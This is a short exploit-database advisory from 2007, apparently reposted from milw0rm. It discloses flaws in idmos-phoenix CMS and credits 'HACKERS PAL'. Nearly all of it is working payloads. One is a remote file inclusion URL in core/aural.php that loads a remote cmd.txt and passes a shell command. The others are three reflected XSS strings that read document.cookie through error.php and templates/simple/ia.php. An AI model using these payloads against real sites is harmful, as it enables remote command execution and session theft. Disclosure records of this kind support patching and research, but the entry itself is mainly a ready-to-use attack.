idmos-phoenix CMS - 'aural.php' Remote File Inclusion

EKU-ID: 12450	CVE: OSVDB-38633;CVE-2007-5294;OSVDB-38632;OSVDB-38631;CVE-2007-5293	OSVDB-ID:
Author: HACKERS PAL	Published: 2007-10-07	Verified:
Download:

Rating

☆☆☆☆☆

idmos-phoenix cms Remote File inclusion

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net

RFI
core/aural.php?site_absolute_path=http://localhost/cmd.txt?&cmd=dir

Xss
error.php?err_msg=<script>alert(document.cookie);</script>
templates/simple/ia.php?content=<script>alert(document.cookie);</script>
# WwW.SoQoR.NeT

# milw0rm.com [2007-10-07]